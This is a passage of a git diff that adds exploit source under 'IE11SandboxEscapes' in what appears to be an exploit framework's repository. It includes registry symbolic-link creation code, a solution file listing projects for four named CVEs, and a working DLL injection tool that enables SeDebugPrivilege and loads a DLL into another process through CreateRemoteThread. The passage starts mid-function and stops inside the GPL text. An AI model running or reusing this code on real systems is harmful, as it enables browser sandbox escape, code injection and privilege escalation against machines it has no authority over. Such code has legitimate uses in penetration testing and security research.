+		status = NtDeleteKey(hdl_nt_keyhandle);
+
+		if (status == 0) {
+			DebugPrintf("DEBUG: %ls deleted successfully.\n", par_src);
+		}
+		else {
+			DebugPrintf("ERROR: Link deletion failed. [Step 2] [Error %08X]\n", status);
+			return 1;
+		}
+	}
+	else {
+		DebugPrintf("ERROR: Link deletion failed. [Step 1] [Error %08X]\n", status);
+		return 1;
+	}
+
+	return 0;
+};
+
+int CreateLink(LPCWSTR par_src, LPCWSTR par_dst, int opt_volatile)
+{
+	DWORD disposition, status;
+	HANDLE hdl_nt_keyhandle;
+	UNICODE_STRING nt_keyname, nt_valuename;
+	OBJECT_ATTRIBUTES nt_object_attributes;
+
+	ntapi_init();
+
+	nt_keyname.Buffer = par_src;
+	nt_keyname.Length = wcslen(par_src) * sizeof(WCHAR);
+
+	nt_object_attributes.ObjectName = &nt_keyname;
+	nt_object_attributes.Attributes = OBJ_CASE_INSENSITIVE;
+	nt_object_attributes.RootDirectory = NULL;   //
+	nt_object_attributes.SecurityDescriptor = NULL;   // unused for this object type
+	nt_object_attributes.SecurityQualityOfService = NULL;   //
+	nt_object_attributes.Length = sizeof(OBJECT_ATTRIBUTES);
+
+	// create the key
+	if (opt_volatile)
+		status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_VOLATILE | REG_OPTION_CREATE_LINK, &disposition);
+	else
+		status = NtCreateKey(&hdl_nt_keyhandle, KEY_ALL_ACCESS, &nt_object_attributes, 0, NULL, REG_OPTION_NON_VOLATILE | REG_OPTION_CREATE_LINK, &disposition);
+
+	if (status == 0) {
+		DebugPrintf("DEBUG: Key %ls created successfully.\n", par_src);
+
+		// the real action is here:
+
+		nt_valuename.Buffer = REG_LINK_VALUE_NAME;
+		nt_valuename.Length = wcslen(REG_LINK_VALUE_NAME) * sizeof(WCHAR);
+
+		status = NtSetValueKey(hdl_nt_keyhandle, &nt_valuename, 0, REG_LINK, par_dst, wcslen(par_dst) * sizeof(WCHAR));
+
+		if (status == 0) {
+			DebugPrintf("DEBUG: Value REG_LINK:%ls=%ls set succesfully.\n", REG_LINK_VALUE_NAME, par_dst);
+		}
+		else {
+			DebugPrintf("ERROR: Link creation failed. [Step 2] [Error %08X]\n", status);
+			return 1;
+		}
+	}
+	else {
+		DebugPrintf("ERROR: Link creation failed. [Step 1] [Error %08X]\n", status);
+		return 1;
+	}
+
+	return 0;
+}
+
+
+int ntapi_init(void) {
+	#ifdef DEBUG
+	DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtCreateKey...\n");
+	#endif
+	if(!(NtCreateKey = (fNtCreateKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtCreateKey" ))) {
+		DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
+		return 1;
+	}
+	#ifdef DEBUG
+	DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtDeleteKey...\n");
+	#endif
+	if(!(NtDeleteKey = (fNtDeleteKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtDeleteKey" ))) {
+		DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
+		return 1;
+	}
+	#ifdef DEBUG
+	DebugPrintf("DEBUG: Initializing NTDLL.DLL:NtSetValueKey...\n");
+	#endif
+	if(!(NtSetValueKey = (fNtSetValueKey) GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtSetValueKey" ))) {
+		DebugPrintf("This program works only on Windows NT/2000/XP/NET\n");
+		return 1;
+	}
+	return 0;
+}
+
diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.h
new file mode 100755
index 0000000000..b760e6e540
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/regln.h
@@ -0,0 +1,70 @@
+/*--------------------------------------------------------------------
+REGLN - Manage Windows Rregistry Links                           V20R0
+======================================================================
+            Antoni Sawicki <as@ntinternals.net>; Dublin, July 10 2005;
+
+  The following Copyrights apply:
+
+    Copyright (c) 1998-2005 by Antoni Sawicki  <as@ntinternals.net>
+    Copyright (c) 1998-2005 by Tomasz Nowak <tommy@ntinternals.net>
+    Copyright (c) 1998 by Mark Russinovich  <mark@sysinternals.com>
+
+  License:
+
+  This software is distributed under the terms  and  conditions  of
+  GPL  - GNU  General  Public  License. The software is provided AS
+  IS and ABSOLUTELY NO WARRANTY IS  GIVEN.  The  author  takes   no
+  responsibility for any damages or consequences  of  usage of this 
+  software. For more information, please read the attached GPL.TXT.
+
+--------------------------------------------------------------------*/
+
+
+
+#define REG_LINK_VALUE_NAME    L"SymbolicLinkValue" // found by tenox
+//#define REG_OPTION_CREATE_LINK 2 // this is defined in MSVC 2.0 but not after
+#define REG_OPTION_OPEN_LINK_ATTR   0x100 // found by tommy
+#define OBJ_CASE_INSENSITIVE   0x40
+
+//
+// Following definitions are generously provided by Mark Russinovitch
+//
+typedef struct _UNICODE_STRING {
+	WORD Length;
+	WORD MaximumLength;
+	PCWSTR  Buffer;
+} UNICODE_STRING;
+typedef UNICODE_STRING *PUNICODE_STRING;
+
+typedef struct _OBJECT_ATTRIBUTES {
+	DWORD Length;
+	HANDLE RootDirectory;
+	PUNICODE_STRING ObjectName;
+	DWORD Attributes;
+	PVOID SecurityDescriptor; 
+	PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES;
+typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
+
+typedef DWORD (__stdcall *fNtCreateKey)(
+	HANDLE KeyHandle, 
+	DWORD DesiredAccess, 
+	POBJECT_ATTRIBUTES ObjectAttributes,
+	DWORD TitleIndex, 
+	PUNICODE_STRING Class, 
+	DWORD CreateOptions, 
+	PDWORD Disposition 
+);
+
+typedef DWORD (__stdcall *fNtSetValueKey)(
+	HANDLE  KeyHandle,
+	PUNICODE_STRING  ValueName,
+	DWORD  TitleIndex,
+	DWORD  Type,
+	const void*  Data,
+	DWORD  DataSize
+);
+
+typedef DWORD (__stdcall *fNtDeleteKey)(
+	HANDLE KeyHandle
+);
diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.cpp
new file mode 100755
index 0000000000..51ec5e2107
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CommandUtils.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.h
new file mode 100755
index 0000000000..c846c60793
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/stdafx.h
@@ -0,0 +1,15 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <tchar.h>
+#include <Windows.h>
+#include <strsafe.h>
+#include <vector>
+#include <string>
+#include <sstream>
diff --git a/external/source/exploits/IE11SandboxEscapes/CommonUtils/targetver.h b/external/source/exploits/IE11SandboxEscapes/CommonUtils/targetver.h
new file mode 100755
index 0000000000..87c0086de7
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CommonUtils/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/IE11SandboxEscapes.sln b/external/source/exploits/IE11SandboxEscapes/IE11SandboxEscapes.sln
new file mode 100755
index 0000000000..f5cf04e173
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/IE11SandboxEscapes.sln
@@ -0,0 +1,72 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.30501.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectDll", "InjectDll\InjectDll.vcxproj", "{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2013-5045", "CVE-2013-5045\CVE-2013-5045.vcxproj", "{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CommonUtils", "CommonUtils\CommonUtils.vcxproj", "{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2013-5046", "CVE-2013-5046\CVE-2013-5046.vcxproj", "{7A9AC14A-00BC-4A69-9B86-C80635606FEA}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2014-0268", "CVE-2014-0268\CVE-2014-0268.vcxproj", "{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2014-0257", "CVE-2014-0257\CVE-2014-0257.vcxproj", "{2A46841E-E3FC-42FF-BCDF-70F76E757E26}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Debug|x64 = Debug|x64
+		Release|Win32 = Release|Win32
+		Release|x64 = Release|x64
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|Win32.ActiveCfg = Debug|Win32
+		{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|x64.ActiveCfg = Debug|x64
+		{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Debug|x64.Build.0 = Debug|x64
+		{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|Win32.ActiveCfg = Release|Win32
+		{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|x64.ActiveCfg = Release|x64
+		{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}.Release|x64.Build.0 = Release|x64
+		{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|Win32.ActiveCfg = Debug|Win32
+		{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|Win32.Build.0 = Debug|Win32
+		{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|x64.ActiveCfg = Debug|x64
+		{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Debug|x64.Build.0 = Debug|x64
+		{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|Win32.ActiveCfg = Release|Win32
+		{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|Win32.Build.0 = Release|Win32
+		{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|x64.ActiveCfg = Release|x64
+		{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}.Release|x64.Build.0 = Release|x64
+		{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|Win32.ActiveCfg = Debug|Win32
+		{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|Win32.Build.0 = Debug|Win32
+		{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|x64.ActiveCfg = Debug|x64
+		{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Debug|x64.Build.0 = Debug|x64
+		{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|Win32.ActiveCfg = Release|Win32
+		{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|Win32.Build.0 = Release|Win32
+		{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|x64.ActiveCfg = Release|x64
+		{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}.Release|x64.Build.0 = Release|x64
+		{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|Win32.ActiveCfg = Debug|Win32
+		{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|x64.ActiveCfg = Debug|x64
+		{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Debug|x64.Build.0 = Debug|x64
+		{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|Win32.ActiveCfg = Release|Win32
+		{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|x64.ActiveCfg = Release|x64
+		{7A9AC14A-00BC-4A69-9B86-C80635606FEA}.Release|x64.Build.0 = Release|x64
+		{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|Win32.ActiveCfg = Debug|Win32
+		{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|x64.ActiveCfg = Debug|x64
+		{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Debug|x64.Build.0 = Debug|x64
+		{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|Win32.ActiveCfg = Release|Win32
+		{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|x64.ActiveCfg = Release|x64
+		{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}.Release|x64.Build.0 = Release|x64
+		{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|Win32.ActiveCfg = Debug|Win32
+		{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|Win32.Build.0 = Debug|Win32
+		{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|x64.ActiveCfg = Debug|x64
+		{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Debug|x64.Build.0 = Debug|x64
+		{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|Win32.ActiveCfg = Release|Win32
+		{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|Win32.Build.0 = Release|Win32
+		{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|x64.ActiveCfg = Release|x64
+		{2A46841E-E3FC-42FF-BCDF-70F76E757E26}.Release|x64.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.cpp b/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.cpp
new file mode 100755
index 0000000000..4dfba1f89c
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.cpp
@@ -0,0 +1,107 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes.  If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+
+BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
+{
+	TOKEN_PRIVILEGES tp;
+	LUID luid;
+
+	if(!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
+	{
+		printf("Error 1 %d\n", GetLastError());
+		return FALSE;
+	}
+
+	tp.PrivilegeCount = 1;
+	tp.Privileges[0].Luid = luid;
+	if(bEnablePrivilege)
+	{
+		tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+	}
+	else
+	{
+		tp.Privileges[0].Attributes = 0;
+	}
+
+	if(!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
+	{
+		printf("Error adjusting privilege %d\n", GetLastError());
+		return FALSE;
+	}
+
+	if(GetLastError() == ERROR_NOT_ALL_ASSIGNED)
+	{
+		printf("Not all privilges available\n");
+		return FALSE;
+	}
+
+	return TRUE;
+}
+
+
+int _tmain(int argc, _TCHAR* argv[])
+{
+	if(argc < 3)
+	{
+		printf("Usage: InjectDll pid PathToDll\n");
+		return 1;
+	}
+
+	WCHAR path[MAX_PATH];
+
+	GetFullPathName(argv[2], MAX_PATH, path, nullptr);
+	int pid = wcstoul(argv[1], 0, 0);
+
+	printf("Injecting DLL: %ls into PID: %d\n", path, pid);
+
+	HANDLE hToken;
+	OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
+
+	SetPrivilege(hToken, SE_DEBUG_NAME, TRUE);
+
+	HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, pid);
+	if(hProcess)
+	{
+		size_t strSize = (wcslen(path) + 1) * sizeof(WCHAR);		
+		LPVOID pBuf = VirtualAllocEx(hProcess, 0, strSize, MEM_COMMIT, PAGE_READWRITE);
+		if(pBuf == NULL)
+		{
+			printf("Couldn't allocate memory in process\n");
+			return 1;
+		}
+		SIZE_T written;
+		if (!WriteProcessMemory(hProcess, pBuf, path, strSize, &written))
+		{
+			printf("Couldn't write to process memory\n");
+			return 1;
+		}
+
+		LPVOID pLoadLibraryW = GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryW");
+
+		if(!CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibraryW, pBuf, 0, NULL))
+		{
+			printf("Couldn't create remote thread %d\n", GetLastError());
+		}
+	}
+	else
+	{
+		printf("Couldn't open process %d\n", GetLastError());
+	}
+
+	return 0;
+}
+
diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj b/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj
new file mode 100755
index 0000000000..73d3147876
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/InjectDll.vcxproj
@@ -0,0 +1,155 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{4AD1637F-88D8-4AF8-ADF4-027272C10BDD}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>InjectDll</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+    <PlatformToolset>v120</PlatformToolset>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="InjectDll.cpp" />
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.cpp
new file mode 100755
index 0000000000..85ffe01166
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// InjectDll.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.h b/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.h
new file mode 100755
index 0000000000..83ad88a10f
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/stdafx.h
@@ -0,0 +1,12 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <stdio.h>
+#include <tchar.h>
+#include <Windows.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/InjectDll/targetver.h b/external/source/exploits/IE11SandboxEscapes/InjectDll/targetver.h
new file mode 100755
index 0000000000..87c0086de7
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/InjectDll/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/LICENSE b/external/source/exploits/IE11SandboxEscapes/LICENSE
new file mode 100755
index 0000000000..70566f2d0e
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/LICENSE
@@ -0,0 +1,674 @@
+GNU GENERAL PUBLIC LICENSE
+                       Version 3, 29 June 2007
+
+ Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                            Preamble
+
+  The GNU General Public License is a free, copyleft license for
+software and other kinds of works.
+
+  The licenses for most software and other practical works are designed
+to take away your freedom to share and change the works.  By contrast,
+the GNU General Public License is intended to guarantee your freedom to
+share and change all versions of a program--to make sure it remains free
+software for all its users.  We, the Free Software Foundation, use the
+GNU General Public License for most of our software; it applies also to
+any other work released this way by its authors.  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+them if you wish), that you receive source code or can get it if you
+want it, that you can change the software or use pieces of it in new
+free programs, and that you know you can do these things.
+
+  To protect your rights, we need to prevent others from denying you
+these rights or asking you to surrender the rights.  Therefore, you have
+certain responsibilities if you distribute copies of the software, or if
+you modify it: responsibilities to respect the freedom of others.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must pass on to the recipients the same
+freedoms that you received.  You must make sure that they, too, receive
+or can get the source code.  And you must show them these terms so they
+know their rights.
+
